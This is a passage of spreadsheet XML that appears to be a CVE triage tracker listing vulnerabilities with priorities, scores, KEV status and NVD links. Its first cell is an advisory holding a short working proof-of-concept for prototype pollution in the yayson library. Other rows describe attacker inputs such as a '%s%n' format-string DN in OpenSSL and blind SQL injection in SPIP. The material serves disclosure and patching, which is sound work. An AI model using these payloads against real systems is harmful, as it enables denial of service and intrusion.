`Store`/`LegacyStore` key internal lookup tables by the `type`, `id`, and relationship names from a JSON:API document. Because these were plain objects, a document with `type: "__proto__"` writes onto `Object.prototype`, polluting every object in the process.
# Severity
Suggested CVSS v3.1 `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H` (8.1). The guaranteed impact is process-wide DoS / logic corruption; escalation to authorization bypass or RCE is dependent on gadgets in the consuming application.
# Affected / Patched
- Affected: `&lt;= 4.2.0` (verified in `3.0.0` and `4.2.0`; all 3.x and 4.x).
- Patched: `4.3.0`.
# Details
`type` is a string *value*, untouched by `JSON.parse`, and is used directly as an object key:
```js
if (!models[type]) models[type] = {}          // models["__proto__"] is Object.prototype → skipped
if (!models[type][id]) models[type][id] = model // → Object.prototype[id] = model
```
The attacker controls the polluted key (`id`) and value (the model, populated from `attributes`). Pollution persists for the process lifetime. The malicious type can also arrive via an `included` resource referenced by a relationship, bypassing any `data.type` allow-list. `LegacyStore` is additionally reachable when a configured `types` mapping resolves to `"__proto__"`.
# Proof of concept
```js
const { Store } = require('yayson')()
new Store().sync({ data: { type: '__proto__', id: 'polluted', attributes: { x: 1 } } })
console.log(({}).polluted) // { x: 1, id: 'polluted' }  ← Object.prototype polluted
```
# Workarounds
Reject documents whose `type` or relationship names are `__proto__`, `constructor`, or `prototype`, or run Node with `--disable-proto=throw`.
# Fix
Null-prototype lookup tables, rejection of `__proto__`/`constructor`/`prototype` as document-derived member names, `Object.keys()` iteration, and null-prototype normalization of caller-supplied caches.</t>
        </is>
      </c>
      <c r="S586" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61534</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S586"/>
  <conditionalFormatting sqref="E2:E58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86">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 xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S548" r:id="rId547"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S549" r:id="rId548"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S550" r:id="rId549"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S551" r:id="rId550"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S552" r:id="rId551"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S553" r:id="rId552"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S554" r:id="rId553"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S555" r:id="rId554"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S556" r:id="rId555"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S557" r:id="rId556"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S558" r:id="rId557"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S559" r:id="rId558"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S560" r:id="rId559"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S561" r:id="rId560"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S562" r:id="rId561"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S563" r:id="rId562"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S564" r:id="rId563"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S565" r:id="rId564"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S566" r:id="rId565"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S567" r:id="rId566"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S568" r:id="rId567"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S569" r:id="rId568"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S570" r:id="rId569"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S571" r:id="rId570"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S572" r:id="rId571"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S573" r:id="rId572"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S574" r:id="rId573"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S575" r:id="rId574"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S576" r:id="rId575"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S577" r:id="rId576"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S578" r:id="rId577"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S579" r:id="rId578"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S580" r:id="rId579"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S581" r:id="rId580"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S582" r:id="rId581"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S583" r:id="rId582"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S584" r:id="rId583"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S585" r:id="rId584"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S586" r:id="rId5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Added to KEV</t>
        </is>
      </c>
      <c r="C2" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D2" s="5" t="inlineStr"/>
      <c r="E2" s="5" t="inlineStr"/>
      <c r="F2" s="5" t="inlineStr"/>
      <c r="G2" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H2" s="5" t="inlineStr"/>
      <c r="I2" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J2" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K2" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L2" s="5" t="inlineStr"/>
      <c r="M2" s="5" t="inlineStr"/>
      <c r="N2" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O2" s="5" t="inlineStr"/>
      <c r="P2" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr"/>
      <c r="R2"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S2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D3" s="5" t="inlineStr"/>
      <c r="E3" s="5" t="inlineStr"/>
      <c r="F3" s="5" t="inlineStr"/>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I3" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr"/>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr"/>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D4" s="5" t="inlineStr"/>
      <c r="E4" s="5" t="inlineStr"/>
      <c r="F4" s="5" t="inlineStr"/>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I4" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr"/>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr"/>
      <c r="R4"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S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63073</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-134</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>Issue summary: OpenSSL CMP response validation passed an unexpected response
sender distinguished name directly as the format string to `ERR_raise_data()`.
Impact summary: A malicious or intercepted CMP endpoint can crash a CMP client
that enforces an expected sender or uses a pinned server certificate whose
subject becomes the default expected sender.
CWE: CWE-134 (Use of Externally-Controlled Format String)
Description: When validating a received CMP message, ossl_cmp_msg_check_update()
converts the peer-supplied sender distinguished name with X509_NAME_oneline()
and passes it directly as the format argument to ERR_raise_data(). Percent
characters survive the conversion, so a sender DN such as "CN=%s%n" reaches
BIO_vsnprintf() as an attacker-controlled format string with no matching variadic
arguments. This path is only reached when the caller configures an expected
sender or pins a server certificate, which is the normal configuration for a
CMP client validating server responses.
Since the attacker controls the format string but none of the variadic
arguments, such specifiers as %s and %n dereference or write through unrelated
stack contents and crash the client. The reliable consequence is a denial of
service, when the response comes from a malicious or intercepted CMP endpoint.
There is no controlled memory write, arbitrary-address read, or reliable path
to remote code execution.
FIPS impact: no
No FIPS modules are affected by this issue, as the CMP protocol
implementation is outside the OpenSSL FIPS module boundary.</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63073</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78445</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78445</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84390</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>9.800000000000001</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>psirt@fortinet.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-540</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>A inclusion of sensitive information in source code vulnerability in Fortinet FortiMonitorOnSight 7.2.4 through 7.2.7, FortiMonitorOnSight 7.2.0 through 7.2.2 may allow attacker to improper access control via &lt;insert attack vector here&gt;</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84390</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75803</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>openssl</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>openssl:openssl</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-08-25</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-354</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>Issue summary: ChaCha20-Poly1305 and AES-OCB decryption with an empty
ciphertext can report success without verifying the supplied authentication
tag when the operation is finalized by calling the EVP_Cipher() function.
Impact summary: Applications calling EVP_Cipher() on an empty ciphertext and
expecting the call to check the AEAD tag may accept forged messages.
CWE: CWE-354 (Improper Validation of Integrity Check Value)
Description: The EVP_Cipher() API call for AEAD ciphers behaves like a one
shot encryption and decryption call. It also verifies the AEAD tag after the
decryption operation. However for AES-OCB and ChaCha20-Poly1305 ciphers
it skipped the AEAD tag verification when an empty ciphertext was passed to
the function. The callers of this function might believe that a successful
return indicates a valid AEAD tag for these ciphers, even when that has not
truly been validated in this case.
FIPS impact: no
The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this CVE
as the affected algorithms are not FIPS approved and thus not implemented
in the FIPS module.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75803</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69854</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>9</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>spring</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>Improper authentication in Spring Cloud Azure allows an unauthorized attacker to elevate privileges over a network.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69854</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84645</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-915, CWE-94</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, objects of types marked as storing their configuration in independent top-level configuration files in Jenkins (such as the global configuration and jobs) can appear as nested field values in user-submitted `config.xml` documents and subsequently handle HTTP requests via Stapler, resulting in remote code execution.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84645</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84648</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, the system log viewer does not escape log record metadata (source, level, and timestamp) resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers in control of agent processes.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84648</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84650</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>jenkins:jenkins</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-502, CWE-566</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>In Jenkins 2.579 and earlier, LTS 2.568.2 and earlier, transient fields cannot be excluded from deserialization, allowing attackers able to submit configuration updates to specify the values of transient fields that will be deserialized, the impact depending on how those fields are used.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84650</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72708</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>postgresql, mysql</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>SPIP before 4.4.18 contains an unauthenticated blind SQL injection vulnerability in the SQL escaping layer that allows unauthenticated attackers to inject arbitrary SQL by supplying a crafted annee parameter value matching a word character followed by an open parenthesis, which bypasses escaping for date-type columns across MySQL, SQLite, and PostgreSQL backends. Attackers can exploit the always-present sitemap.xml.html template's annee criterion to embed unescaped time-based or boolean payloads into database queries, enabling extraction of arbitrary database content including the alea_ephemere secret used to sign SPIP action nonces.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72708</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81532</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>cna@mongodb.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>mongodb:bi_connector_odbc_driver</t>
        </is>
      </c>
